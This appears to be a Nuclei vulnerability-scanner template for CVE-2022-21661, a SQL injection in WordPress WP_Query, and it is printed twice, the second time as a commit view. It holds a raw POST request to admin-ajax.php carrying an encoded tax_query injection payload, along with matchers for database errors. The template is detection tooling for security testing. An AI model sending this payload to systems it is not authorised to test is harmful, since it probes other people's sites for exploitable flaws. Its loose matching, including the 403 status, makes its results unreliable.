nuclei-templates/cves/2022/CVE-2022-21661.yaml

id: CVE-2022-21661

info:
  name: WordPress Core 5.8.3 <=  'WP_Query' SQL Injection
  author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/
  severity: Critical
  description: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection.
  reference:
    - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
    - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection
  classification:
    
    cve-id: CVE-2022-21661
    
  tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure_Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,*/*;q-0.8,application/signed-exchange/;v=b3;q=0.9
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: cross-site
        Sec-Fetch-User: ?1
        Cache-Control: max-age=0
        Connection: close 
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 92

        action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d

    stop-at-first-match: false
    matchers-condition: or
    matchers:

      - type: word
        words:
          - 'WordPress database error:'
        part: body

      - type: status
        status:
          - 403  

    
    extractors:
      - type: regex
        part: all
        regex:
          - "WordPress database error*"
          - "You have an error in your SQL syntax*"
          - "403 Forbidden*"
New Template CVE-2022-21661 2023-03-24 14:34:38 +00:00			`id: CVE-2022-21661`

			`info:`
			`name: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection`
			`author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/`
			`severity: Critical`
			`description: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection.`
			`reference:`
			`- https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317`
			`- https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection`
			`classification:`

			`cve-id: CVE-2022-21661`

			`tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli`

			`requests:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Upgrade-Insecure_Requests: 1`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,/;q-0.8,application/signed-exchange/;v=b3;q=0.9`
			`Sec-Fetch-Dest: document`
			`Sec-Fetch-Mode: navigate`
			`Sec-Fetch-Site: cross-site`
			`Sec-Fetch-User: ?1`
			`Cache-Control: max-age=0`
			`Connection: close`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 92`

			`action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d`

			`stop-at-first-match: false`
			`matchers-condition: or`
			`matchers:`

			`- type: word`
			`words:`
			`- 'WordPress database error:'`
			`part: body`

			`- type: status`
			`status:`
			`- 403`


			`extractors:`
			`- type: regex`
			`part: all`
			`regex:`
			`- "WordPress database error*"`
			`- "You have an error in your SQL syntax*"`
			`- "403 Forbidden*"`